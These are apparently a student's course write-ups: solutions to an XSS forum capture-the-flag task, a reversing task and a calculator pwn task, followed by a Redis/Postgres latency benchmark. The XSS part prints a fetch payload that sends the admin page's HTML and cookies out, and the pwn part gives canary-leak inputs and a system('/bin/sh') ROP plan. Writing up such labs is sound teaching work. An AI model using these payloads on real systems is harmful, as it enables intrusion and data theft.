BSK2020 - Lorak

Web task

In this task we are provided with a URL. The site is some kind of forum - it lets us create threads, and then post messages in them. We can also report a thread to the admin - which is a pretty strong hint that this is an XSS challenge.

Thread creation:

Thread with 2 messages:

Message length is very limited. There is info on the main page: "Posts are strictly limited to 13 characters (and that includes HTML formatting automatically added by the editor)". Messages are sent using POST requests, with a body of the form content=contents_of_message. The editor wraps our message in HTML tags - but since we control the raw POST body, we can skip the editor's wrapping, and those inserted tags immediately look like a great place for XSS. And indeed, splitting a script tag across 3 messages - using comments to hide the markup the forum inserts between them - results in the expected alert. After reserving 4 characters for the closing and opening comment, we are left with 9 characters of JS per message, which is enough to execute pretty much arbitrary code. To make my life easier, I prepared a small snippet which dynamically generated and sent those messages.

Now, all that's left is to find the flag. The first attempt was, of course, stealing admin cookies with a payload such as: fetch('' + btoa(document.cookie)). Unfortunately, the admin has no cookies (or at least no cookies without the httpOnly flag). Request from the admin - as you can see, the data parameter is empty:

To get the flag, we must first notice the existence of the /admin_panel endpoint. There are at least 2 ways to do that:

- The Referer header in the bot's request points to that exact endpoint.
- Scanning the site with a directory-bruteforcing tool; even a default wordlist can locate this URL.

OK, so we probably need the contents of /admin_panel. If we look at the headers of the response from any endpoint, we can see that the X-Frame-Options header is set to SAMEORIGIN - which means we can almost surely load /admin_panel in an iframe and access its content. Payload that extracts /admin_panel and sends its content to my server:

```js
function prepareFrame() {
    var iframe = document.createElement("iframe");
    iframe.setAttribute("src", "/admin_panel");
    iframe.onload = function() {
        console.log(iframe.contentWindow.document.documentElement.outerHTML);
        fetch('', {method: 'POST',
                   body: btoa(iframe.contentWindow.document.documentElement.outerHTML)});
    };
    document.body.appendChild(iframe);
}
prepareFrame();
```

As expected, the admin sent us a request with a pretty long payload. Decoding that base64 payload gives us the HTML code:

Uncommunicative people forum



Thread to be reviewed:

No posts.
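Stepping back to the message-splitting trick: generating the 13-character posts can be automated. A hypothetical sketch - the exact first/last posts and chunk framing below are assumptions consistent with the "4 characters reserved for comments" budget described above, not the original payloads:

```python
def split_payload(js: str, limit: int = 13) -> list[str]:
    """Split JS into forum posts. Each middle post is */<chunk>/*,
    so the HTML the forum inserts between posts is commented out.
    Naive split: must not cut inside a string literal."""
    chunk = limit - 4  # 4 chars reserved for the closing */ and opening /*
    chunks = [js[i:i + chunk] for i in range(0, len(js), chunk)]
    posts = ["<script>/*"]                       # open script, start a comment
    posts += ["*/" + c + "/*" for c in chunks]   # 9 chars of JS per post
    posts += ["*/</script>"]                     # close last comment and script
    return posts

posts = split_payload("alert(1)")
assert all(len(p) <= 13 for p in posts)
assert len(posts) == 3  # matches the 3 messages used in the writeup
```

Each resulting post fits the 13-character limit; the JS comments swallow whatever markup the forum puts between consecutive posts.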
Flag: FLAG{2bb0e8357ffff1596a8a2970ab8dbb192bee0dd6}

Reversing task

Author: Karol Baryła (kb406092)

Let's start by analyzing the program in Ghidra. The first thing to notice is that the program reads 0x128 bytes from the provided file, and only continues if the read succeeds. This, and the way those bytes are accessed later, tells us that those 0x128 bytes are a struct - some kind of file header. Upon further inspection of the code, this structure can be deduced to look like this (note the sizes add up: 4 + 4 + 256 + 32 = 0x128 bytes, matching the read):

```c
struct __attribute__((__packed__)) header_struct {
    uint32_t MAGIC_NUMBER;
    uint32_t file_length;
    char original_filename[256];
    char encrypted_password[32];
};
```

header_struct.MAGIC_NUMBER determines whether the file is encrypted using the easy or the hard algorithm. After that, a few more things happen before the file contents are decrypted - let's leave those for later and see how decryption is performed. The encrypted file is read 4 bytes at a time; those 4 bytes (interpreted as a 32-bit int) are passed to the decryption function (which one, easy or hard, is determined by the magic number), the function returns the decrypted int, and it is written to the decrypted file. The code looks like this (in Ghidra):

```c
i = 0;
if (file_header.file_length != 0) {
  do {
    read_chars = fread(&local_17c,4,1,encrypted_file);
    if (read_chars != 1) {
      perror("fread");
LAB_00100e88:
      retval = 1;
      goto LAB_00100d69;
    }
    if (file_header.MAGIC_NUMBER == 0xb542020) {
      local_17c = decrypt_easy(local_17c);
    }
    else {
      local_17c = func_0x001030b0(local_17c);
    }
    remaining = file_header.file_length - i;
    if (4 < remaining) {
      remaining = 4;
    }
    read_chars = fwrite(&local_17c,(long)remaining,1,decrypted_file);
    if (read_chars != 1) {
      perror("fwrite");
      goto LAB_00100e88;
    }
    i = i + 4;
  } while (i < file_header.file_length);
}
```

where func_0x001030b0 is the hard decryption function. Now that we know how the decryption functions are used, let's go through the rest of this function. First, the program iterates through part of its own memory and decrypts it using the easy decryption function:
```c
target_value = (uint *)0x103254;
next_ptr = (uint32_t *)0x1030b0;
do {
    i = *next_ptr;
    next_ptr = next_ptr + 1;
    i = decrypt_easy(i);
    next_ptr[-1] = i;
} while (next_ptr != target_value);
```

The decoded region contains 2 functions: the hard decryption function, and one other that's not important for now (let's call it strange_function). We can get the decoded bytes easily - set a breakpoint in gdb after the decryption is complete and dump the decrypted bytes to a file. Getting Ghidra to analyze them is trickier - the byte view allows replacing single bytes, and should allow replacing a byte range, but there were errors no matter what I did. Fortunately, there is a way around it - let's automate entering those bytes from the keyboard; Ghidra has no problem with that. After copying the hexlified bytes, use this command:

```sh
sh -c 'sleep 10; xdotool type "$(xclip -o -selection clipboard)"'
```

It waits 10 seconds, and then simulates typing the clipboard content on the keyboard. Now that we have the decrypted code in Ghidra, let's look briefly at the decryption functions. Code of decrypt_easy:

```c
uint decrypt_easy(uint param_1) {
    uint uVar1;
    uint uVar2;
    uVar2 = param_1 ^ decrypt_buffer[0];
    uVar1 = decrypt_buffer[2] * 0x2137 + uVar2;
    decrypt_buffer[0] = decrypt_buffer[1];
    decrypt_buffer[1] = decrypt_buffer[2];
    decrypt_buffer[2] = decrypt_buffer[3];
    decrypt_buffer[3] = uVar1 >> 6 | uVar1 * 0x4000000;
    return uVar2;
}
```

It uses a global buffer (as some kind of cyclic buffer) and does some operations on it - what exactly it does is not really important. The important part is: the output depends on the input and the contents of this buffer, and the buffer is modified during the call. decrypt_hard is similar, just a bit more complicated.
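Before looking at decrypt_hard, it helps to have decrypt_easy available outside the binary. A Python transcription (a sketch - the 32-bit wrapping is made explicit; `uVar1 >> 6 | uVar1 * 0x4000000` is a rotate-right by 6):

```python
decrypt_buffer = [0, 0, 0, 0]  # global cyclic state, as in the binary
MASK = 0xFFFFFFFF

def decrypt_easy(x: int) -> int:
    out = (x ^ decrypt_buffer[0]) & MASK
    t = (decrypt_buffer[2] * 0x2137 + out) & MASK
    # shift the 4-slot buffer and append t rotated right by 6 bits
    decrypt_buffer[0] = decrypt_buffer[1]
    decrypt_buffer[1] = decrypt_buffer[2]
    decrypt_buffer[2] = decrypt_buffer[3]
    decrypt_buffer[3] = ((t >> 6) | (t << 26)) & MASK
    return out

# the output is just input XOR buffer head, so with a known buffer state
# a desired output `target` is produced by feeding target ^ decrypt_buffer[0]
decrypt_buffer[:] = [0xAABBCCDD, 1, 2, 3]  # illustrative state
target = 0x41414141
assert decrypt_easy(target ^ 0xAABBCCDD) == target
```

Since the output is only the input XORed with decrypt_buffer[0], knowing the buffer state makes the function trivially invertible - which is exactly what the password crack at the end relies on.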
```c
uint decrypt_hard(uint param_1) {
    uint uVar1;
    uint uVar2;
    uVar2 = param_1 ^ decrypt_buffer[0];
    uVar1 = decrypt_buffer[2] * 0x2137 + uVar2;
    decrypt_buffer[0] = decrypt_buffer[2] * 0x7a69 + decrypt_buffer[1];
    decrypt_buffer[1] = decrypt_buffer[2];
    decrypt_buffer[2] = decrypt_buffer[2] * 0x1234567 + decrypt_buffer[3];
    decrypt_buffer[3] = uVar1 >> 6 | uVar1 * 0x4000000;
    return uVar2;
}
```

There are 2 more things happening in the main function. First, the buffer is modified and strange_function is called:

```c
decrypt_buffer[0] = getpid();
decrypt_buffer[1] = getppid();
strange_function(&file_header);
```

Second, the password is processed: it is unhexlified and written to a different location. The tricky part is that the bytes are not saved just to some buffer, but also to other addresses, which can be hard to notice in the default decompilation:

```c
password_fragment = *__s;
__isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 4);
password_fragment = __s[1];
__isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 3);
password_fragment = __s[2];
__isoc99_sscanf(password_fragment,"%x",0x1030d7);
password_fragment = __s[3];
__isoc99_sscanf(password_fragment,"%x",0x1030bd);
password_fragment = __s[4];
__isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 2);
password_fragment = __s[5];
__isoc99_sscanf(password_fragment,"%x",0x1030dc);
password_fragment = __s[6];
__isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 1);
password_fragment = __s[7];
__isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer);
```

These addresses are located inside decrypt_hard - in fact they correspond to the constants found in decrypt_hard's code - so those constants get replaced with parts of the password. After that, the unhexlified password is "decrypted" (in this case we should probably say encrypted?) using decrypt_easy, and compared with a field from the header (if they are equal, the password is correct).
```c
global_pwd = password_global;
password_global[0] = decrypt_easy(unhexlified_pass_buffer[4]);
password_global[1] = decrypt_easy(unhexlified_pass_buffer[3]);
password_global[2] = decrypt_easy(0x2137);
password_global[3] = decrypt_easy(0x7a69);
password_global[4] = decrypt_easy(unhexlified_pass_buffer[2]);
password_global[5] = decrypt_easy(0x1234567);
password_global[6] = decrypt_easy(unhexlified_pass_buffer[1]);
password_global[7] = decrypt_easy(unhexlified_pass_buffer[0]);
retval = memcmp(file_header.encrypted_password,global_pwd,0x20);
```

The way Ghidra decompiles this code is very confusing, and in my opinion incorrect - it shows numeric literals being passed to decrypt_easy, but in fact the values under those addresses are used (and the addresses are in a writeable part of memory, so I have no idea why it shows literals):

```
00100c14 8b 3d a3 24 00 00   MOV   phVar1, dword ptr [LAB_001030bc+1]
00100c1a 89 05 68 26 00 00   MOV   dword ptr [password_global[2]], read_chars
00100c20 e8 db 03 00 00      CALL  decrypt_easy
```

The point is: the constants in decrypt_hard are modified, so they behave more like variables, and we need to account for this while recreating the program. That's pretty much all we need to know to recreate the program's source (we haven't looked at strange_function yet, but how it works is not important). Let's copy all the code to a .c file, fix compilation errors, and remember that we need to perform the decryption of the code, because it modifies the buffer. The result is code that works like the original (+ prints some debug info). Link to code

Now we can work with this source; the binary is no longer relevant. Let's clean up and simplify this code. Apart from typical cleanup, there is one thing we can do to eliminate some code: the decryption of the encrypted functions is unnecessary - we don't use the result, but we still need the procedure, because it modifies the encryption buffer.
So let's print the buffer after decryption and use it as the starting buffer - then we can skip this whole step. Link to cleaned up code.

Now let's see what strange_function is and how to simplify it. Internally it uses a function I called push_data_to_buffer, defined as follows:

```c
void push_data_to_buffer(uint32_t param_1){
    uint32_t retval = param_1 ^ decrypt_queue[0];
    decrypt_queue[0] = decrypt_queue[1];
    decrypt_queue[1] = decrypt_queue[2];
    decrypt_queue[2] = decrypt_queue[3];
    decrypt_queue[3] = retval >> 6 | retval << 0x1a;
    return;
}
```

It treats decrypt_queue (the name is not really good) as a cyclic buffer. The operations here are pretty simple. The binary first sets 2 elements of this buffer, then calls strange_function:

```c
decrypt_buffer[0] = getpid();
decrypt_buffer[1] = getppid();
strange_function(&file_header);
```

strange_function first calls push_data_to_buffer 64 times - once for each 4 bytes of the original_filename field of the header struct. Then it opens /proc/self/status and searches for fields ending with Pid - which are Pid, PPid and TracerPid. This seems to be some form of anti-debugging - if TracerPid is different from 0, decryption will fail. The interesting part is: getpid() and getppid() give different results on every run, so why does anything work here? It is caused by how push_data_to_buffer works. If buffer[0] = x and the function is then called 64 times - let's say with param_1 = 0 for simplicity - then afterwards buffer[0] = x again (the buffer cycles 64 / 4 = 16 times, so x gets rotated by 6 * 16 = 96 bits in total, which is a multiple of 32). So the Pid and PPid contributions cancel out against the values read from /proc/self/status. This means we can use any values instead of getpid() and getppid(), as long as push_data_to_buffer is called again with the same values after the 64 calls. That means we can simplify it a bit.
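This "everything rotates back after 64 calls" claim is easy to verify with a pure-Python model of push_data_to_buffer (starting state arbitrary):

```python
MASK = 0xFFFFFFFF
decrypt_queue = [0xDEADBEEF, 0x1337, 42, 7]  # arbitrary illustrative state

def push_data_to_buffer(p: int) -> None:
    r = (p ^ decrypt_queue[0]) & MASK
    decrypt_queue[0] = decrypt_queue[1]
    decrypt_queue[1] = decrypt_queue[2]
    decrypt_queue[2] = decrypt_queue[3]
    decrypt_queue[3] = ((r >> 6) | (r << 26)) & MASK  # rotate right by 6

start = list(decrypt_queue)
for _ in range(64):
    push_data_to_buffer(0)
# 64 calls = 16 full cycles of the 4-slot queue; each slot has been rotated
# by 6 * 16 = 96 bits, a multiple of 32, so the state is back where it started
assert decrypt_queue == start
```

With nonzero parameters the update is still linear over XOR, which is why the pid/ppid values placed in the buffer before the 64 filename pushes can be cancelled by pushing the same values read back from /proc/self/status, as described above.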
Let's delete the getpid() and getppid() calls, set the first 2 elements of the buffer to 0s, and change strange_function to this:

```c
void strange_function(struct header_struct* header) {
    char* orig_filename = header->original_filename;
    char* enc_password = header->encrypted_password;
    do {
        push_data_to_buffer(*(uint32_t *)orig_filename);
        orig_filename += 4;
    } while (orig_filename != enc_password);
    for(int i = 0; i < 3; i++) {
        push_data_to_buffer(0);
    }
}
```

Yay, everything still works. The only thing left is to add decryption without the password. There is nothing problematic about it - it is a simple XOR. Earlier we saw that the return value of decrypt_easy is the argument XORed with the first element of the buffer. And we know that the "decrypted" password has to be equal to a specific field in the file header. So the goal is: decrypt_easy(unhexlified_pass_buffer[i]) == ((int*)file_header.encrypted_password)[i]. For index 0 we have: decrypt_queue[0] ^ unhexlified_pass_buffer[0] == ((int*)file_header.encrypted_password)[0]. Well, we know decrypt_queue and file_header.encrypted_password, so we can easily decrypt the password:

```c
for(int i = 0; i < 8; i++) {
    // Password cracking - originally there was a sscanf that unhexlified the entered password
    unhexlified_pass_buffer[i] = ((int*)file_header.encrypted_password)[i] ^ decrypt_queue[0];
    password_processed[i] = decrypt_easy(unhexlified_pass_buffer[i]);
}
```

Link to final code

Pwn task

Author: Karol Baryła

There are 2 main bugs in the code that can be used together to exploit it. There is no bounds checking when accessing stack_token and stack_value - so we can easily cause a buffer overflow with the right expression, e.g. one that begins with '(' * 32.
When parsing the ) character, there is no check whether stack_token[sp-1] == TOKEN_VALUE - which makes it possible to read memory we shouldn't be able to, by doing something like (+): parsing the + character won't trigger a write to stack_value[sp], but parsing ) will read this field and copy it to the previous one - while at the same time setting stack_token[sp-2] to TOKEN_VALUE.

Combining those 2 bugs, we can e.g. create a payload that reads the canary from the stack: ((((((((((((((((((((((((((((((((+)))))))))))))))))))))))))))))))). Output values are always 64-bit floating point values, but we can get back the original value using Python's struct module:

```
>>> struct.pack('d', -2.39820918180181417655e-39)
b'\x00\xb1\xbbB;\x1d\xea\xb7'
>>> hex(struct.unpack('Q', b'\x00\xb1\xbbB;\x1d\xea\xb7')[0])
'0xb7ea1d3b42bbb100'
```

The only problem with a payload like the one presented above is that reading a value from the stack also copies it to every field between the start of stack_value and the value's original location. The way to fix it is to write the right values back after reading what we want. We can do that by pushing the read value a few slots down, going back up to the clobbered values, and writing them using a proper combination of )'s, +'s and values. Example: first, let's read the value immediately after the buffer and save it to variable a: a=(((((((((((((((((((((((((((((((+))))))))))))))))))))))))))))))). Then, to read the next value from the stack while preserving the previous one, we can use a payload like this: b=((((((((((((((((((((((((((((((((+))))))))+0*(0+a))))))))))))))))))))))))). How it works: we push the new value 8 slots down using 8x ). Then we go 6 slots up, using +0*(0+, and write a's value to the proper slot - the one below b's original location. If we need to fix more entries, it is very similar: c=(((((((((((((((((((((((((((((((((+)))))))))+0*((0+b)+a))))))))))))))))))))))))). After each written entry we go 2 slots down, and then one up, to write the next entry. We have everything we need - let's hack the program.
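The double-to-integer conversion used above is worth wrapping in two helpers (the hex value is the canary from the example; otherwise struct only):

```python
import struct

def d2u(d: float) -> int:
    """Reinterpret a double's bytes as an unsigned 64-bit int."""
    return struct.unpack("<Q", struct.pack("<d", d))[0]

def u2d(u: int) -> float:
    """Reinterpret an unsigned 64-bit int's bytes as a double."""
    return struct.unpack("<d", struct.pack("<Q", u))[0]

canary = 0xb7ea1d3b42bbb100
# the mapping is a bijection on the raw bytes, so it round-trips exactly
assert d2u(u2d(canary)) == canary
```

Every leaked double goes through d2u once; u2d is used in the other direction when sending addresses back into the calculator.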
The battle plan is to read some values from the stack in order to get libc's and the binary's addresses. Once we know the addresses, we can create a simple ROP chain to execute system('/bin/sh'). This chain consists of 3 elements: pop rdi, then the address of the '/bin/sh' string in libc, and then the address of system(). After a few hours of debugging, I got a working script. LINK TO SCRIPT

And the flag from the server: BSK{s3Nd-r3cV-f1X-5enD-h4X}

Now let's move on to the "harder" version. The only difference is that it quits after executing an expression that doesn't assign to a variable. This effectively prohibits reading any contents of memory. That's a problem for our script, because we now have no way of leaking addresses back to us, and so no way of calculating the addresses needed for the ROP chain. The solution is pretty simple - the binary is a calculator, so let's make it calculate everything for us. This would be impossible in the general case: the calculator performs operations on doubles, and we want to perform operations on the representations of those doubles, treated as unsigned 64-bit ints. It turns out that's not a problem here, thanks to how doubles are represented in memory. The 12 high bits are the sign bit and the exponent - those will always be 0 in our case, because we operate on addresses, and in Linux userspace addresses always have the 16 high bits cleared (they could also all be set to 1, but that's only possible in the kernel, so we don't need to worry about it here). So, if the sign bit and exponent are 0s, the addition of 2 doubles equals the addition of their representations (as long as the addition itself doesn't overflow into the exponent): a * 2^-1074 + b * 2^-1074 = (a+b) * 2^-1074. Well, that's all we need - let's modify the exploit.
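This addition-of-representations property is easy to sanity-check (the values below are made-up, address-like integers; both patterns and their sum stay far below 2^53, the range in which the pattern-to-value map is linear):

```python
import struct

def u2d(u: int) -> float:
    return struct.unpack("<d", struct.pack("<Q", u))[0]

def d2u(d: float) -> int:
    return struct.unpack("<Q", struct.pack("<d", d))[0]

base   = 0x7FFFF7A52390   # hypothetical libc address
offset = 0x4F550          # hypothetical offset to system()

# adding the tiny (subnormal) doubles adds the underlying bit patterns exactly
assert d2u(u2d(base) + u2d(offset)) == base + offset
```

Both operands are subnormal doubles (value = pattern * 2^-1074), and their sum is still exactly representable, so the calculator's floating-point addition performs exact 64-bit integer addition on the representations.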
LINK TO SCRIPT

And the flag from the server: BSK{0n35hoT-w1Th-d3n0rM4l-f1o4Tz}

Bonus: a "beautiful" GDB script that was very helpful while debugging my exploits.

ZBD - Task 4 - ad display system

Author: Karol Baryła (kb406092)

The code used in this task is available in the repository: ZBD - Zadanie 4 - system wyświetlania reklam

Test platform

CPU: AMD Ryzen 9 3900, 12 cores / 24 threads, 3.1GHz
RAM: 64GB (2x32GB) 3200MHz
SSD: 1TB M.2 Samsung 970 PRO | PCIe 3.0 x4 | NVMe (read ~3.5GB/s, access time ~0.04ms)

Description of the solutions

Redis

Process 1 generates a new request identified by a UUID. Under the key request- it stores a hashmap of the form {'client_id': random uuid, 'ip': random ip, 'time_1': current time}. Then it adds information about this request to two queues, one for type-2 processes and one for type-3 processes. The queues are implemented as lists, so process 1 executes the command RPUSH nazwa_kolejki 'request-'. Then it repeats everything from the beginning.

Processes 2 and 3 use the BLPOP command to fetch requests from their queues. It is a blocking version of LPOP - if the list we want to pop from is empty, the call blocks until something appears in it. When a new element appears, the client that has been waiting the longest is woken up. According to the Redis documentation, BLMOVE is the recommended way to implement queues - but we don't need to worry about process failures here, so BLPOP is sufficient.

Process 2 takes an element from the queue, then reads the client identifier from the corresponding hashmap. Based on that identifier it draws a random country name and writes it to the same hashmap under the key 'country'. This is a simplified version of what this process was supposed to do: generate additional information about the request. After writing this data, it pushes a notification onto a separate queue that process 3 waits on.

Process 3 takes a request from the queue (just like process 2). Then, in 50% of cases, it immediately writes to the request's hashmap the information that the ad was displayed, together with the current time.
In the remaining 50% of cases it first waits until process 2 finishes processing (it waits on an appropriate queue, which really isn't a queue but more of a... semaphore? barrier? condition variable? semaphore probably fits best), and then, with 50% probability, writes the ad-display information to the database.

Postgres

Everything works almost identically to the Redis version - we use Postgres instead of Redis, of course, so the data is stored somewhat differently. There is a table for requests (with columns corresponding to the keys of the Redis hashmap: request_id, client_id, ip, country, time_1, time_2, time_3, type), and 2 tables for the queues (the columns are request_id and status, i.e. whether the entry has already been taken). Additionally, an insert into a queue triggers a notification on the appropriate channel. An attempt to take an element from a queue looks like this:

```sql
UPDATE queue_2 SET status='taken'
WHERE request_id IN (
    SELECT request_id FROM queue_2
    WHERE status='new'
    LIMIT 1
    FOR NO KEY UPDATE SKIP LOCKED
)
RETURNING request_id;
```

Notifications are received immediately in processes 2 and 3 with the help of select, as described in the documentation.

Test methodology

Latency is measured as the difference between the timestamps recorded by processes 3 and 1. I ran the tests in two scenarios: without resource limits, and with resource limits (1 CPU, 0.5GB RAM) applied via the appropriate Docker flags (--cpus=1 --memory=512m). Each test lasts 5 seconds. In all plots, the X axis is the time the request was sent (i.e. the time recorded by process 1), and the Y axis is the response time (time 3 - time 1). Units on both axes are milliseconds. An SLA 95% value of X means that 95% of requests were handled in time X or faster.

Redis Pub/Sub

I spent quite a lot of time trying to use the pub/sub mechanism to pass the information from process 2 to process 3 that processing has finished. The mechanism turned out to be too unreliable, though - there were situations where the receiving process lost a message, which was problematic: the process would hang and nothing worked.
I tried to fix this in various ways - even receiving messages in a dedicated thread, so that it happens continuously - to no avail. An example plot from such a situation:

Handled 6878 of 54236 results (12.68%)
SLA for Immediately send ad 95%: 3.49 ms, 99%: 4.12 ms, 99.9%: 4.67 ms
SLA for Send ad after processing 95%: 3.66 ms, 99%: 4.55 ms, 99.9%: 4.82 ms

I had to rework the 2->3 communication to be similar to 1->2 and 1->3: process 2 executes RPUSH finished-, and process 3 does BLPOP finished-. This produces a lot of abandoned keys - whenever process 3 doesn't wait for the result from process 2 - and in a real application they would have to be cleaned up somehow.

Tests

Let's start with Redis without hardware limits. Running 1 process of each type gives the following results:
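As a side note on the methodology: the SLA percentiles quoted in these tests can be computed from a list of per-request latencies with a small helper (a sketch; function name and data are illustrative, not the actual test harness):

```python
import math

def sla(latencies_ms, pct):
    """Smallest latency X such that pct% of requests finished within X ms."""
    ordered = sorted(latencies_ms)
    k = math.ceil(pct / 100 * len(ordered))  # how many requests must fit under X
    return ordered[k - 1]

# illustrative data: a single slow outlier dominates the 95th percentile
latencies = [1.0, 2.0, 3.0, 4.0, 100.0]
assert sla(latencies, 80) == 4.0
assert sla(latencies, 95) == 100.0
```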